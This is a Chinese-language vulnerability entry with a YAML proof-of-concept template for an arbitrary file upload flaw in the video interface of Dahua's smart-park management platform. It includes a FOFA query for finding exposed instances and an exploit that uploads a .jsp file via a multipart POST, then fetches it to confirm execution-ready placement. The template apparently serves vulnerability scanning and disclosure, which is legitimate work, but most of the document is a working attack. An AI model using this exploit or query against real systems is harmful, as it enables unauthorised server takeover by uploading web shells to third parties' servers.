漏洞描述
大华 智慧园区综合管理平台 video 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,控制服务器权限
FOFA: app="dahua-智慧园区综合管理平台"
dahua-zhyq-video-fileupload: 大华 智慧园区综合管理平台 video 任意文件上传漏洞
PoC代码[已公开]
id: dahua-zhyq-video-fileupload
info:
name: 大华 智慧园区综合管理平台 video 任意文件上传漏洞
author: peiqi
severity: high
verified: true
description: |
大华 智慧园区综合管理平台 video 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,控制服务器权限
FOFA: app="dahua-智慧园区综合管理平台"
reference:
- https://peiqi.wgpsec.org/wiki/iot/大华/大华%20智慧园区综合管理平台%20video%20任意文件上传漏洞.html
tags: dahua,fileupload
created: 2023/08/13
set:
randstr: randomLowercase(10)
randbody: randomLowercase(30)
rboundary: randomLowercase(8)
rules:
r0:
request:
method: POST
path: /publishing/publishing/material/file/video
headers:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
body: "\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"Filedata\"; filename=\"test.jsp\"\r\n\
\r\n\
{{randbody}}\r\n\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"Submit\"\r\n\
\r\n\
submit\r\n\
------WebKitFormBoundary{{rboundary}}--\r\n\
"
expression: response.status == 200 && response.body.bcontains(b'"path":')
output:
search: '"\"path\":\"(?P<path>.*?)\"".bsubmatch(response.body)'
path: search["path"]
r1:
request:
method: GET
path: /publishingImg/{{path}}
expression: response.status == 200 && response.body.bcontains(bytes(randbody))
expression: r0() && r1()